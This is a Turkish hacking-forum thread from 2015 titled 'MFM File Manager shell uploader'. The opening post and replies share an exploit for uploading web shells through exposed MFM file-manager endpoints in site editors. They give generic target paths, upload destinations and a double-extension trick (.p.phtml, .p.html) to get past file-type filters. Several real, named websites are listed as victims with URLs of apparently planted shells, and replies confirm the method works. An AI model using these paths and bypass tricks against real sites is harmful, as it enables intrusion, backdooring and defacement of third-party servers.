Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: MFM File Manager shell uploader
Stallk3r
*
avatar
Albay
Durum: Çevrimdışı
Seviye Puanı: 34
Yaşam Puanı: 718 / 826
Deneyim: 4 / 100
Rep Sayısı: 425
Mesaj Sayısı: 1618
Üyelik Tarihi: 06.11.2013
     
Yorum: #1
MFM File Manager shell uploader
16.07.2015 12:33


[+] Title : mfm File Manager shell uploader

----------------------------------------------------



[+] Author : RedVirus Maroc



---------------------------------------------------



[+] Date : 14 / 7 / 2015



----------------------------------------------------



[+] Exploit by : Red Virus Maroc



----------------------------------------------------



[+] Dork google :
Hide Post




====================================================



exploit :







upload your shell .phtml





====================================================

********************************************************************************​******

demo :

http://drewal.com.pl/admin/wysiwyg/mfm/m...standalone



shell :

http://drewal.com.pl/!data/upload.p.phtml



********************************************************************************​******

demo :

http://www.cosplaydeviants.com/js/tinymce/mfm.php#



shell :

http://disdik-jambiprov.com/texteditor/u...ad.p.phtml



********************************************************************************​******



./End



./RED VIRUS MAROC


Dans ederken görülenler deli sanılır, Müziği duymayanlar tarafından.
Alinti
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimiçi
Seviye Puanı: 55
Yaşam Puanı: 1,372 / 1,372
Deneyim: 90 / 100
Rep Sayısı: 2766
Mesaj Sayısı: 6322
Üyelik Tarihi: 21.08.2013
     
Yorum: #2
Cvp: MFM File Manager shell uploader
16.07.2015 12:59
ANALİZ =>

Dosya Yükleyicisi EkraN Görüntüsü



Ahaaaaa

Örnek =>
Kod:
http://drewal.com.pl/!data/cyberizm.jpg

Kısacası Exploit Kodumuz =>

Exploit 1 =>

Kod:
HEDEFSITE/admin/wysiwyg/mfm/mfm.php?mode=standalone

Dosyanın Gittiği Yol =>
Kod:
!data/DOSYANIZIN.İSMİ.html


Exploit 2 =>
2)
Kod:
HEDEFSITE/js/tinymce/mfm.php

Dosyanın Gittiği Yol =>
Kod:
HEDEFSITE/texteditor/upload/DOSYANIZIN-İSMİ.html


Direk .php veya .html yükleyince böyle hata alınıyor Exciting Ancak .png .jpg ve .gif anında yükleniyor.
Fakat başka sitelerde DOSYA-İSMİ.p.html şeklinde shell yüklenebilir

Precondition Failed

The precondition on the request for the URL /admin/wysiwyg/mfm/mfm.php evaluated to false.

____________________________________________________________________

Eline emeğine sağlık Smile

Denendi çalışıyor Smile
(Bu konu en son: 16.07.2015 Tarihinde, Saat: 13:09 düzenlenmiştir. Düzenleyen: KingSkrupellos.)
Alinti
Stallk3r
*
avatar
Albay
Durum: Çevrimdışı
Seviye Puanı: 34
Yaşam Puanı: 718 / 826
Deneyim: 4 / 100
Rep Sayısı:
Mesaj Sayısı: 1618
Üyelik Tarihi: 06.11.2013
     
Yorum: #3
Cvp: MFM File Manager shell uploader
16.07.2015 13:09
(16.07.2015 12:59)KingSkrupellos Nickli Kullanıcıdan Alıntı:  ANALİZ =>

Dosya Yükleyicisi EkraN Görüntüsü



Ahaaaaa

Örnek => http://drewal.com.pl/!data/cyberizm.jpg

Direk .php veya .html yükleyince böyle hata alınıyor Exciting Ancak .png .jpg ve .gif anında yükleniyor.
Fakat başka sitelerde DOSYA-İSMİ.p.html şeklinde shell yüklenebilir

Precondition Failed

The precondition on the request for the URL /admin/wysiwyg/mfm/mfm.php evaluated to false.

____________________________________________________________________

Eline emeğine sağlık Smile

Denendi çalışıyor Smile


(16.07.2015 12:59)KingSkrupellos Nickli Kullanıcıdan Alıntı:  ANALİZ =>

Dosya Yükleyicisi EkraN Görüntüsü



Ahaaaaa

Örnek => http://drewal.com.pl/!data/cyberizm.jpg

Direk .php veya .html yükleyince böyle hata alınıyor Exciting Ancak .png .jpg ve .gif anında yükleniyor.
Fakat başka sitelerde DOSYA-İSMİ.p.html şeklinde shell yüklenebilir

Precondition Failed

The precondition on the request for the URL /admin/wysiwyg/mfm/mfm.php evaluated to false.

____________________________________________________________________

Eline emeğine sağlık Smile

Denendi çalışıyor Smile

Gördüğüm gibi paylaştım denemedim işte siz yaparsını (y)

Dans ederken görülenler deli sanılır, Müziği duymayanlar tarafından.
Alinti
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimiçi
Seviye Puanı: 55
Yaşam Puanı: 1,372 / 1,372
Deneyim: 90 / 100
Rep Sayısı:
Mesaj Sayısı: 6322
Üyelik Tarihi: 21.08.2013
     
Yorum: #4
Cvp: MFM File Manager shell uploader
16.07.2015 13:10
(16.07.2015 13:09)J4CK4L Nickli Kullanıcıdan Alıntı:  Gördüğüm gibi paylaştım denemedim işte siz yaparsını (y)

Paylaştığın Exploitleri ilk önce dene kendinde daha sonra paylaş Smile
Sen paylaştığın için değil yanlış anlama - hemen analiz yapalım ki herkes yararlansın diye yaptım Smile
(Bu konu en son: 16.07.2015 Tarihinde, Saat: 13:12 düzenlenmiştir. Düzenleyen: KingSkrupellos.)
Alinti
RuLing
*
avatar
Yüzbaşı
Durum: Çevrimdışı
Seviye Puanı: 15
Yaşam Puanı: 78 / 371
Deneyim: 87 / 100
Rep Sayısı: 33
Mesaj Sayısı: 288
Üyelik Tarihi: 24.02.2015
     
Yorum: #5
Cvp: MFM File Manager shell uploader
16.07.2015 13:29
Bakalım Smile

Exciting Exciting Exciting

http://postimg.org/image/rhkks07gl/
(Bu konu en son: 16.07.2015 Tarihinde, Saat: 13:33 düzenlenmiştir. Düzenleyen: RuLing.)

Alinti



1 Ziyaretçi